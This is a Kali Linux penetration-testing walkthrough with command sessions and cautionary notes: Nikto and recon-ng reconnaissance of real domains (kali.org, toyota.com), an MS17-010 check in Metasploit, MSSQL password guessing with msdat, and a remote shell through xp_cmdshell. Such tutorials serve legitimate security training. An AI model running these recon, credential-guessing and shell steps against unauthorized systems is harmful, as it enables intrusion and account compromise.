Kali Linux
Nikto Web Scanner (as with every tool on this page, only run it against hosts you are authorized to test; the public domains below are used purely as illustration):
root@kali:/# nikto -h kali.org -p 80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.124.249.10
+ Target Hostname:    kali.org
+ Target Port:        80
+ Start Time:         2018-08-07 04:59:05 (GMT-4)
---------------------------------------------------------------------------
+ Server: Sucuri/Cloudproxy
Note: the Server banner identifies a WAF/CDN edge (Sucuri), not the origin web server. Everything Nikto reports here describes the proxy, and active scanning through such an edge is commonly rate-limited or blocked, so expect incomplete results.
theHarvester (-d is the target domain, -b the data source; search engines throttle automated queries, so if the run returns little or nothing, retry with a different -b source):
root@kali:~# theharvester -d kali.org -b google
recon-ng (the session below uses recon-ng 4.x syntax; 5.x renamed these commands to e.g. `modules load`, `db insert domains`, `db query`, and modules must first be installed with `marketplace install`)
[recon-ng][default] > show workspaces
[recon-ng][default] > workspaces add toyota
[recon-ng][toyota] > show domains
[recon-ng][toyota] > add domains
domain (TEXT): toyota.com
[recon-ng][toyota] > show domains
  +--------------------------------------+
  | rowid |   domain   |    module      |
  +--------------------------------------+
  |   1   | toyota.com | user_defined   |
  +--------------------------------------+

[*] 1 rows returned
[recon-ng][toyota] > use google_site_web
[recon-ng][toyota][google_site_web] > run
[recon-ng][toyota][google_site_web] > show hosts
  | rowid | host           | ip_address | region | country | latitude | longitude | module          |
  | 3     | www.toyota.com |            |        |         |          |           | google_site_web |
[recon-ng][toyota] > use bing_domain_web
[recon-ng][toyota][bing_domain_web] > run
[recon-ng][toyota][bing_domain_web] > show hosts
  | 602 | www.fleet.toyota.com | | | | | | bing_domain_web |
[recon-ng][toyota] > use hackertarget
[recon-ng][toyota][hackertarget] > run
[recon-ng][toyota][hackertarget] > show hosts
  | 41 | toyota.com | 107.154.75.95 | | | | | hackertarget |
[recon-ng][toyota] > use recon/hosts-hosts/resolve
[recon-ng][toyota][resolve] > run
[recon-ng][toyota][resolve] > show hosts
  | 3 | www.toyota.com | 54.239.216.57 | | | | | google_site_web |
[recon-ng][toyota] > use brute_hosts
[recon-ng][toyota][brute_hosts] > run
[recon-ng][toyota][brute_hosts] > show hosts
  | 772 | www.toyota.com | 13.33.172.193 | | | | | brute_hosts |
Note: unlike the search-engine modules above, which only query third-party sources, resolve and brute_hosts issue DNS lookups that may reach the target's authoritative nameservers, so they are not passive and can be logged on the target side.
[recon-ng][toyota] > use mx_spf_ip
[recon-ng][toyota][mx_spf_ip] > run
[*] Retrieving MX records for toyota.com.
[*] [host] mxa-001f1301.gslb.pphosted.com (<blank>)
[*] [host] mxb-001f1301.gslb.pphosted.com (<blank>)
[recon-ng][toyota][mx_spf_ip] > show hosts
  | 675 | mxa-001f1301.gslb.pphosted.com | | | | | | mx_spf_ip |
[recon-ng][toyota] > use reporting/xlsx
[recon-ng][toyota][xlsx] > run
[*] All data written to '/root/.recon-ng/workspaces/toyota/results.xlsx'.
Detect MS17-010 SMB vulnerability using Metasploit:
root@kali:/# netdiscover -r 10.12.0.0/24
Note: netdiscover discovers hosts via ARP, so it only sees machines on the local layer-2 segment; for remote subnets use a routed scan instead.
root@kali:/# masscan -p135,445 10.12.0.21
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2018-08-21 07:23:08 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [2 ports/host]
Discovered open port 445/tcp on 10.12.0.21
Discovered open port 135/tcp on 10.12.0.21
Note: masscan crafts raw packets (it needs root) and, as the forced options show, never pings or resolves names; a closed or filtered 445/tcp here means the SMB check below is pointless.
root@kali:/# msfconsole
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.12.0.21
msf auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.12.0.21:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 R2 3790 Service Pack 2 x86 (32-bit)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Note: the verdict is "likely" because it is inferred from the SMB response, not from exploitation; confirm it and record the reported OS/architecture before picking an exploit, since MS17-010 exploit modules are version-specific. rhosts also accepts a range (e.g. 10.12.0.0/24) to sweep the segment enumerated above.
#################################################
#################################################
msdat: Microsoft SQL Database Attacking Tool
sudo apt-get install freetds-dev
(The steps below assume the msdat repository has already been cloned to /msdat and its Python dependencies installed.)
root@kali:/msdat# vim /etc/freetds/freetds.conf
# Add "use ntlmv2 = yes" to the [global] section of your FreeTDS configuration file:
[global]
        # TDS protocol version
        tds version = auto
        use ntlmv2 = yes
root@kali:/# cd /msdat/
root@kali:/msdat# ./msdat.py passwordguesser -s 10.0.0.23
[1] (10.0.0.23:1433): Searching valid accounts on the 10.0.0.23 server, port 1433
The login sa has already been tested at least once. What do you want to do:
- stop (s/S)
- continue and ask every time (a/A)
- continue without to ask (c/C)
c
100% |#################################################################################################################################################| Time: 00:00:01 | ETA: 00:00:00
[+] Accounts found on 10.0.0.23:1433/master: {'sa': 'sa'}
Note: the hit is the default/weak credential pair sa:sa. Password guessing is noisy (every miss is a failed-login event in the SQL Server log) and, for logins that enforce Windows password policy, may lock accounts out — check the lockout policy with the client before running it against production.
root@kali:/msdat# ./msdat.py xpcmdshell -s 10.0.0.23 -U 'sa' -P 'sa' --shell
[1] (10.0.0.23:1433): Trying to get a shell thanks to xpcmdshell
10.0.0.23$ hostname
Note: passing -P on the command line leaves the password in shell history and visible to other users via ps. If xp_cmdshell is disabled on the target, obtaining this shell requires enabling it, which is a configuration change on the server that should be recorded and reverted during cleanup; commands run through it typically execute with the privileges of the SQL Server service account.